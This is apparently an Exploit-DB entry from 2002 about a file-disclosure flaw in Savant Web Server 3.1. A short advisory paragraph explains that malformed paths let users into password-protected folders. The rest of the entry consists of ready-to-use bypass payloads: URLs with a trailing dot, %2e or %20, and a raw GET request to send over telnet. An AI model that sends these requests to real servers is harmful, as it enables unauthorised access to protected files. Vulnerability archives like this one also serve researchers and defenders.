Savant Web Server 3.1 - File Disclosure

EDB-ID:

21794




Platform:

Windows

Date:

2002-09-13


source: https://www.securityfocus.com/bid/5709/info

Savant Webserver is vulnerable to an input validation bug, that could allow malicious users access to password protected folders. 

It should be noted that versions below 3.1 may also be vulnerable to this issue.

http://host/password_folder.
"GET /password_folder / HTTP/1.0" <-- use with telnet
http://host/password_folder%2e
http://host/password_folder%20